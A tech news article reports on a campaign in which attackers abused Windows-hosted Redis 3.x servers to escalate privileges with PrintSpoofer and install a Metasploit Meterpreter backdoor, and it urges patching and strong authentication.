Skip to content

Redis servers exploited to install Metasploit Meterpreter backdoor

  • by
  • 3 min read

Threat actors are introducing the Metasploit Meterpreter backdoor on Windows devices via Remote Dictionary Server (Redis), an open-source in-memory database.

Redis is used worldwide for multiple purposes, including session management, message brokerage, and queuing. However, as the tool is used widely, it is also a target of threat actors.

Threat actors have installed various malware, including Kinsing, P2PInfect, Skidmap, Migo, and HeadCrab, due to some or other vulnerabilities in Redis servers, such as a lack of robust authentication mechanisms. These malware variants, known for their malicious capabilities, pose a serious risk to organisations relying on Redis for critical operations.

In the current scenario, where threat actors install Metasploit Meterpreter, researchers found that Windows-based systems running Redis 3.x became the target of a sophisticated cyber assault. The threat actor behind this attack utilised the PrintSpoofer privilege escalation tool, which is well-known for exploiting vulnerabilities in unpatched or poorly managed services.

By leveraging PrintSpoofer’s capabilities, the attacker gained elevated privileges within the system, paving the way for further malicious actions.

Log showing threat actor installing PrintSpoofer.

One notable aspect of this attack was using PowerShell’s ‘invoke-webrequest’ command to download and install PrintSpoofer within the Redis installation path. This tactic, combined with the modification of certain strings within PrintSpoofer, demonstrates the attacker’s efforts to evade detection and enhance the attack’s effectiveness.

As researchers noted, this attack was significantly different from previous ones. They noted a significant shift in the attacker’s methodology. Previously, the attackers used PowerShell to download malicious payloads; in the current campaign, they shifted to the CertUtil tool. This strategic change underscores the evolving nature of cyber threats and the need for cybersecurity professionals to adapt their defence strategies accordingly.

Log showing the installation of Metasploit Stager.

Following the successful installation of PrintSpoofer, the threat actor deployed Metasploit’s Stager malware. This component of the Metasploit framework facilitates the download and execution of Meterpreter, a potent backdoor that grants the attacker complete control over the compromised system. Meterpreter’s capabilities include accessing sensitive data, executing arbitrary commands, and establishing persistence within the network.

The implications of such attacks are far-reaching. Organisations relying on Redis servers, especially those exposed to the internet without adequate security measures, are at heightened risk of falling victim to similar cyber assaults. Researchers have emphasised the importance of promptly patching and securing Redis servers, implementing strong authentication protocols and leveraging protective software to mitigate these threats effectively.

In March 2023, a Redis bug exposed ChatGPT customer data, including personal and financial information.

In the News: Apple issues spyware attack alert to people in 92 countries

Kumar Hemant

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: